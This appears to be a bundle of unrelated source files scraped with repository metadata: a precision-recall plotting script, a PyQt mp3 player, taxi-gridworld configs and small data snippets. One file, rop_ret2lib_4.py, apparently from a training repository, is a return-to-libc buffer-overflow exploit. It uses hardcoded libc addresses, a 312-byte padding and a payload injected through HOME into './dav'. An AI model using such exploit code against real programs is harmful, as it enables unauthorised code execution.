source_id_dataset = tf.data.Dataset.from_tensors(source_id).repeat()
sources.append(tf.data.Dataset.zip((dataset, source_id_dataset)))
if add_dataset_offset:
offset += len(dataset_spec.get_classes(split))
# Sample uniformly among sources
dataset = tf.data.experimental.sample_from_datasets(sources)
def map_fn(batch, source_id):
return process_batch(*batch, image_size=image_size), source_id
dataset = dataset.map(map_fn)
# Overlap episode processing and training.
dataset = dataset.prefetch(1)
return dataset
|
[
"adrian.el_baz@ens-paris-saclay.fr"
] |
adrian.el_baz@ens-paris-saclay.fr
|
b854b2f33147ed15e806a984140b33a8a77e76fe
|
562384347373c3ae872a380e3d2363fbbbe0a5b3
|
/mpr_curves.py
|
c69ac35e2b899d12803af5570e2c60bf74299c74
|
[] |
no_license
|
XingCui666/scripts
|
22df26d072648557bdddc66c93d52d45bab64c7e
|
4f7488fd37ff0bf4f9bf78e93711a058885655c7
|
refs/heads/master
| 2022-04-14T15:46:24.407738
| 2020-03-24T04:30:53
| 2020-03-24T04:30:53
| 159,750,624
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,172
|
py
|
# Created by Kuan Li
import json
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from tqdm import tqdm
import sys
import os
IOU_TH_50 = 0.5
IOU_THS = [i / 20 + 0.5 for i in range(9, -1, -1)]
class Dt:
def __init__(self, img_id, score, bbox, mode="mPR"):
"""
single dt
:param img_id:
:param score: a list of score
:param bbox: bbox
"""
self.img_id = img_id
self.score = score
self.bbox = bbox
if mode == "PR50":
self.is_match = False
else:
self.is_match = [False for _ in range(9, -1, -1)] # 0.95-->0.5
class Gt:
def __init__(self, img_id, bbox, mode="mPR"):
"""
a gt contains a list of gt bboxes
:param img_id:
:param bbox: a list of bboxes
"""
self.img_id = img_id
self.bbox = bbox
if mode == "PR50":
self.is_match = False
else:
self.is_match = [False for _ in range(9, -1, -1)] # 0.95-->0.5
def compute_iou(bbox1, bbox2):
x1, y1, w1, h1 = bbox1
x2, y2, w2, h2 = bbox2
s_sum = w1 * h1 + w2 * h2
left = max(x1, x2)
right = min(x1 + w1, x2 + w2)
top = max(y1, y2)
bottom = min(y1 + h1, y2 + h2)
if left >= right or top >= bottom:
return 0
intersect = (right - left) * (bottom - top)
return intersect / (s_sum - intersect)
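# Quick check (illustration): compute_iou([0, 0, 2, 2], [1, 1, 2, 2]) has an
# intersection of 1*1 = 1 and a union of 4 + 4 - 1 = 7, i.e. IoU = 1/7.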
def prepare_gt_and_dt(gt_path, dt_path, c_id):
"""
:param gt_path: gt path
:param dt_path: dt path
:param c_id: category_id
:return: gt dict and dt list
"""
with open(gt_path, "r") as f:
gt = json.load(f)
gt_objs = gt["annotations"]
gt_imgs = gt["images"]
gt_objs = [an for an in gt_objs if an["category_id"] == c_id]
gt_num = len(gt_objs)
gt_dic = dict() # key: image_id value: a list of Gt
for demo in gt_objs:
if demo["image_id"] in gt_dic:
tmp = Gt(img_id=demo["image_id"], bbox=demo["bbox"], mode=mode)
gt_dic[demo["image_id"]].append(tmp)
else:
gt_dic[demo["image_id"]] = [Gt(img_id=demo["image_id"], bbox=demo["bbox"], mode=mode)]
    # TODO: image_id_set should come from "images", not "annotations". Done.
# image_id_set = gt_dic.keys() #
image_id_set = set([im["id"] for im in gt_imgs])
with open(dt_path, "r") as f:
dt_objs = json.load(f)
dt_objs = [demo for demo in dt_objs
if demo["category_id"] == c_id and demo["image_id"] in image_id_set]
dt_list = list()
for demo in dt_objs:
dt_list.append(Dt(img_id=demo["image_id"], score=demo["score"], bbox=demo["bbox"], mode=mode))
return gt_dic, dt_list, gt_num
def match_dt_2_gt(single_dt, gts, mode="mPR"):
"""
:param single_dt:
:param gts: a list of gt
:param mode:
:return:
"""
if mode == "PR50":
max_iou = 0
max_index = -1
for index, gt in enumerate(gts):
if not gt.is_match:
cur_iou = compute_iou(single_dt.bbox, gt.bbox)
if cur_iou >= IOU_TH_50 and max_iou < cur_iou:
max_index = index
max_iou = cur_iou
if max_index >= 0:
single_dt.is_match = True
gts[max_index].is_match = True
else:
for thres_index, thres in enumerate(IOU_THS): #first match high score
max_iou = 0
max_index = -1
for index, gt in enumerate(gts):
if not gt.is_match[thres_index]:
cur_iou = compute_iou(single_dt.bbox, gt.bbox)
if cur_iou >= thres and max_iou < cur_iou:
max_index = index
max_iou = cur_iou
if max_index >= 0:
single_dt.is_match[thres_index] = True
gts[max_index].is_match[thres_index] = True
def run_match(dt_list, gt_dict, mode):
"""
:param dt_list: a list of Dt class
:param gt_dict: key: image_id value: Gt class
:return:
"""
dt_list.sort(key=lambda x: x.score, reverse=True)
# sorted(dt_list, key=lambda x: x.score)
print("matching dt to gts...")
for single_dt in tqdm(dt_list):
img_id = single_dt.img_id
        # TODO: check that img_id exists. Done.
        if img_id in gt_dict:
match_dt_2_gt(single_dt, gt_dict[img_id], mode=mode)
def get_recalls_and_precisions(dt_list, gt_num, mode="mPR"):
"""
recall: tp / gt_all; precision: tp/ dt_all
:param dt_list:
:param gt_num:
:return:
"""
if mode == "PR50":
is_match = [dt.is_match for dt in dt_list]
scores = [dt.score for dt in dt_list]
tp_list = []
cur_tp = 0
for match in is_match:
if match:
cur_tp += 1
tp_list.append(cur_tp)
recalls = [(tp / gt_num) * 100 for tp in tp_list]
precisions = [(tp / (index + 1)) * 100 for index, tp in enumerate(tp_list)]
return recalls, precisions, scores
else:
recalls_all = [0 for _ in dt_list]
precisions_all = [0 for _ in dt_list]
scores = [dt.score for dt in dt_list]
for index, thres in enumerate(IOU_THS):
is_match = [dt.is_match[index] for dt in dt_list]
tp_list = []
cur_tp = 0
for match in is_match:
if match:
cur_tp += 1
tp_list.append(cur_tp)
recalls = [(tp / gt_num) * 100 for tp in tp_list]
precisions = [(tp / (index + 1)) * 100 for index, tp in enumerate(tp_list)]
recalls_all = [recalls_all[i]+recalls[i] for i in range(len(dt_list))]
precisions_all = [precisions_all[i]+precisions[i] for i in range(len(dt_list))]
recalls_all = [recall/len(IOU_THS) for recall in recalls_all]
precisions_all = [precision/len(IOU_THS) for precision in precisions_all]
return recalls_all, precisions_all, scores
def get_thres_index(scores, score_thres):
indics = []
for thres in score_thres:
for index, score in enumerate(scores):
if score < thres:
indics.append(index)
break
return indics
if __name__ == '__main__':
gt_coco = sys.argv[1]
result1_json = sys.argv[2]
result2_json = sys.argv[3]
benchmark = sys.argv[4]
gt_path = gt_coco
dt_paths = [result1_json, result2_json]
colors = ['red', 'green', 'blue', "cyan", "brown", "black", "orange"] # default color
labels = ['v6.1_nnie', 'v6.2_nnie'] # same length as dt_paths
c_id = 1 # filter category_id
c_labels = {1: "body", 2: "head", 3: "face"}
mode = "mPR" # mPR or PR50
#score_thres = [0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2] # suggestion: descend, plot some key points
#score_marker = ["o", "v", "+", "s", ">", "*", "<"] # marker
score_thres = [0.8, 0.7, 0.6, 0.5] # suggestion: descend, plot some key points
score_marker = ["o", "v", "+", "s"] # marker
for index, dt_path in enumerate(dt_paths):
print("handling {} prlines...".format(labels[index]))
gt_dic, dt_list, gt_num = prepare_gt_and_dt(gt_path, dt_path, c_id)
run_match(dt_list, gt_dic, mode=mode)
recalls, precisions, scores = get_recalls_and_precisions(dt_list, gt_num, mode=mode)
plt.plot(recalls, precisions, linewidth=0.8, color=colors[index], label=labels[index])
indics = get_thres_index(scores, score_thres)
for i, num in enumerate(indics):
plt.scatter(recalls[num], precisions[num], c=colors[index], linewidths=1, marker=score_marker[i])
start_pos = (5, 75)
for i, score in enumerate(score_thres):
plt.text(start_pos[0], start_pos[1]-2*i, "score: {} --> {}".format(score, score_marker[i]))
plt.legend()
plt.xlabel("recalls")
plt.ylabel("precisions")
title = c_labels[c_id] if c_id in c_labels else "unknown"
des_saved = "./prlines_{}_test_{}.png".format(title, benchmark)
plt.title("{} {} on {}".format(title, mode, benchmark))
plt.savefig(des_saved)
plt.show()
print("done")
|
[
"xingcui@qa-gpu018.aibee.cn"
] |
xingcui@qa-gpu018.aibee.cn
|
c3ef23d87718434c242e7c55f33d4ccb0809bb27
|
77170eede81686cc4cac018e243b04d74c146ae6
|
/rop_ret2lib_4.py
|
64b7fdb79598929c51f1333fcbd3f1d116e8460c
|
[] |
no_license
|
Ravin-Academy/rop_ret2libc
|
76e1888608af3270a847e22f019c33a2eeefe7d1
|
88692860b0d601ab11eaad1743ef45a487dbe677
|
refs/heads/main
| 2023-02-20T03:43:55.360916
| 2021-01-23T16:00:14
| 2021-01-23T16:00:14
| 332,245,113
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 528
|
py
|
#!/usr/bin/python
from struct import *
import os
libc_binsh = pack("<I", 0xf7ef7aaa)
libc_printf = pack("<I", 0xf7dcb860)
libc_exit = pack("<I", 0xf7daaa60)
libc_popret = pack("<I", 0xf7e76671)
ret = pack("<I", 0x804900a)
rop_popret = pack("<I", 0x804901e)
buffer = ''
buffer += "A" * 312
# printf("/bin/sh")
buffer += libc_printf
buffer += libc_popret
buffer += pack("<I", 0xf7ef8b41)
# exit()
buffer += libc_exit
buffer += ret
PROGNAME = "./dav"
os.environ['HOME'] = buffer
os.execve(PROGNAME, [PROGNAME], os.environ)
|
[
"ramin.blackhat@gmail.com"
] |
ramin.blackhat@gmail.com
|
169f922fde12e42c0892becb0540abb35f3580b1
|
0fdac0d61352d3759cec291cababeef4c65c59f4
|
/mp3player.py
|
985cf2c87944d304a617b3c8dbd07a46c7d4d1c1
|
[] |
no_license
|
masterx2/VKD
|
e638b1d00233c87a48c3c55753d3e01f901c123f
|
d4aedaaa05d754ddf68c586a224443968efbc6dd
|
refs/heads/master
| 2016-08-06T13:03:55.980854
| 2013-06-23T16:52:42
| 2013-06-23T16:52:42
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,501
|
py
|
__author__ = 'MasterX2'
from PyQt4 import QtGui, QtCore
from PyQt4.phonon import Phonon
class Window(QtGui.QPushButton):
def __init__(self):
QtGui.QPushButton.__init__(self, 'Choose File')
self.mediaObject = Phonon.MediaObject(self)
self.audioOutput = Phonon.AudioOutput(Phonon.MusicCategory, self)
Phonon.createPath(self.mediaObject, self.audioOutput)
self.mediaObject.stateChanged.connect(self.handleStateChanged)
self.clicked.connect(self.handleButton)
def handleButton(self):
if self.mediaObject.state() == Phonon.PlayingState:
self.mediaObject.stop()
else:
path = QtGui.QFileDialog.getOpenFileName(self, self.text())
if path:
self.mediaObject.setCurrentSource(Phonon.MediaSource(path))
self.mediaObject.play()
def handleStateChanged(self, newstate, oldstate):
if newstate == Phonon.PlayingState:
self.setText('Stop')
elif newstate == Phonon.StoppedState:
self.setText('Choose File')
elif newstate == Phonon.ErrorState:
source = self.mediaObject.currentSource().fileName()
print 'ERROR: could not play:', source.toLocal8Bit().data()
if __name__ == '__main__':
import sys
app = QtGui.QApplication(sys.argv)
app.setApplicationName('Phonon')
win = Window()
win.resize(200, 100)
win.show()
sys.exit(app.exec_())
|
[
"true.masterx@gmail.com"
] |
true.masterx@gmail.com
|
7199f038ea4f16a7389261bd5f9003a535c2f491
|
1892a473b7eed6aaa712bc2959a1aca48beec284
|
/domains/gym_taxi/utils/config.py
|
afa1e60798fc34e0d28312b85cf4f1ba3ae3c071
|
[
"MIT"
] |
permissive
|
AndrewPaulChester/sage-code
|
d3753bc894f21ce057c1a273e54926e368529e2b
|
9fe676bfbcbc6f642eca29b30a1027fba2a426a0
|
refs/heads/main
| 2023-05-05T19:08:21.655463
| 2021-05-27T05:21:54
| 2021-05-27T05:21:54
| 371,245,286
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,501
|
py
|
"""
.. module:: config
:synopsis: Contains config parameters for the SDRL taxi world.
"""
import numpy as np
from numpy.random import randint as rand
import matplotlib.pyplot as pyplot
MAX_EPISODE_LENGTH = 500
DISCRETE_ENVIRONMENT_STATES = 500
FIXED_GRID_SIZE = 5
LOCS = [(0, 0), (4, 0), (0, 4), (3, 4)]
MAP = [
"+---------+",
"|R: | : :G|",
"| : : : : |",
"| : : : : |",
"| | : | : |",
"|Y| : |B: |",
"+---------+",
]
MISSING_EDGES = [
((1, 0), (2, 0)),
((0, 3), (1, 3)),
((0, 4), (1, 4)),
((2, 3), (3, 3)),
((2, 4), (3, 4)),
]
OPEN = {
"size": FIXED_GRID_SIZE,
"wall_locations": [],
"passenger_destinations": LOCS,
"passenger_locations": LOCS,
"delivery_limit": 1,
"concurrent_passengers": 1,
"timeout": MAX_EPISODE_LENGTH,
"random_walls": False,
}
ORIGINAL = {
"size": FIXED_GRID_SIZE,
"wall_locations": MISSING_EDGES,
"passenger_destinations": LOCS,
"passenger_locations": LOCS,
"delivery_limit": 1,
"concurrent_passengers": 1,
"timeout": MAX_EPISODE_LENGTH,
"random_walls": False,
}
EXPANDED = {
"size": 20,
"delivery_limit": 1,
"concurrent_passengers": 1,
"timeout": MAX_EPISODE_LENGTH,
"passenger_creation_probability": 1,
"random_walls": True,
}
MULTI = {
"size": 20,
"delivery_limit": 100,
"concurrent_passengers": 5,
"timeout": MAX_EPISODE_LENGTH,
"passenger_creation_probability": 0.05,
"random_walls": True,
}
PREDICTABLE = {
"size": 20,
"delivery_limit": 100,
"concurrent_passengers": 1,
"timeout": 2000,
"passenger_creation_probability": 0.04,
"random_walls": True,
"passenger_locations": [
(0, 0),
(0, 1),
(0, 2),
(1, 0),
(1, 1),
(1, 2),
(2, 0),
(2, 1),
(2, 2),
],
"passenger_destinations": [
(17, 17),
(17, 18),
(17, 19),
(18, 17),
(18, 18),
(18, 19),
(19, 17),
(19, 18),
(19, 19),
],
}
PREDICTABLE15 = {
"size": 15,
"delivery_limit": 100,
"concurrent_passengers": 1,
"timeout": 2000,
"passenger_creation_probability": 0.06,
"random_walls": True,
"passenger_locations": [
(0, 0),
(0, 1),
(0, 2),
(1, 0),
(1, 1),
(1, 2),
(2, 0),
(2, 1),
(2, 2),
],
"passenger_destinations": [
(12, 12),
(12, 13),
(12, 14),
(13, 12),
(13, 13),
(13, 14),
(14, 12),
(14, 13),
(14, 14),
],
}
PREDICTABLE10 = {
"size": 10,
"delivery_limit": 100,
"concurrent_passengers": 1,
"timeout": 2000,
"passenger_creation_probability": 0.08,
"random_walls": True,
"passenger_locations": [(0, 0), (0, 1), (1, 0), (1, 1)],
"passenger_destinations": [(8, 8), (8, 9), (9, 8), (9, 9)],
}
PREDICTABLE5 = {
"size": 5,
"delivery_limit": 100,
"wall_locations": MISSING_EDGES,
"concurrent_passengers": 1,
"timeout": 1000,
"passenger_creation_probability": 0.12,
"random_walls": False,
"passenger_locations": [(0, 0), (0, 1), (1, 0), (1, 1)],
"passenger_destinations": [(3, 3), (3, 4), (4, 3), (4, 4)],
}
FUEL = {
"size": 20,
"delivery_limit": 100,
"concurrent_passengers": 5,
"timeout": MAX_EPISODE_LENGTH,
"passenger_creation_probability": 0.05,
"random_walls": True,
"fuel_use": 1,
}
|
[
"48459485+AndrewPaulChester@users.noreply.github.com"
] |
48459485+AndrewPaulChester@users.noreply.github.com
|
328bccf4b3138a2c108c76e34c1341d685b88b08
|
7e2af9fa47719462a238693c26ac9c872749c58c
|
/Environments/project1_env/lib/python3.6/linecache.py
|
5aed931c8d3afc86198b3c5b70a44b3aa147d47a
|
[] |
no_license
|
williamsonchris/Udacity
|
b0a169f6a02f5897cd810de51f7e4657ccc29b17
|
4c947484f096fff2d8a5916145d3288b461efe25
|
refs/heads/master
| 2020-03-30T08:45:44.107299
| 2018-10-02T05:14:20
| 2018-10-02T05:14:20
| 151,037,529
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 46
|
py
|
/Users/CW/anaconda3/lib/python3.6/linecache.py
|
[
"CW@Chris-Williamson-2.local"
] |
CW@Chris-Williamson-2.local
|
bd6651931aed58d7bfd2c1949c7dea3b99edfd6c
|
b685036280331fa50fcd87f269521342ec1b437b
|
/src/data_mining_demo/py_shuJuWaJue_ruMen_yu_ShiJian/chapter3/demo2.py
|
7e2ee679470b22f9af507b2f12f77a6431309659
|
[] |
no_license
|
chenqing666/myML_DM_Test
|
f875cb5b2a92e81bc3de2a0070c0185b7eacac89
|
5ac38f7872d94ca7cedd4f5057bb93732b5edbad
|
refs/heads/master
| 2022-02-26T01:52:06.293025
| 2019-09-20T06:35:25
| 2019-09-20T06:35:25
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 175
|
py
|
import pickle
import numpy as np
import pandas as pd
datafile = "./cleanedData.dai"
with open(datafile, 'rb') as file:
dataset = pickle.load(file)
print(dataset.head())
|
[
"daijitao@ctsi.com.cn"
] |
daijitao@ctsi.com.cn
|